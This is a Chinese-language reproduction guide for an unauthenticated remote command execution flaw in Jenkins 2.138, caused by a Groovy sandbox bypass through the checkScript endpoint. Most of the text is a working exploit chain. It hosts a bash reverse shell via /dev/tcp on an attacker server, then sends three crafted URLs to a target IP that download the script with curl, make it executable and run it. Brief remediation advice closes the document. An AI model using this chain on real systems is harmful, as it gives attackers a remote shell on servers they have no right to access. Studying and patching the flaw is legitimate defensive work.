一、简介
Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令
Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。
通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令
二、影响版本
Jenkins 2.138
三、漏洞复现
先在自己的服务器上创建一个文件,内容为
bash -i >& /dev/tcp/ip/port 0>&1
然后打开下面的url
http://123.58.224.8:17513/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl+-o+/tmp/1.sh+http://自己服务器ip/1.txt".execute()}}
给下载的文件执行权限
http://123.58.224.8:17513/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"chmod+777+/tmp/1.sh".execute()}}
在自己的服务器上监听端口,然后执行下面的命令
http://123.58.224.8:17513/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"bash+/tmp/1.sh".execute()}}
四、修复
1.设置强口令
2.尽量不要开放到公网
3.限制来源IP
4.升级到最新版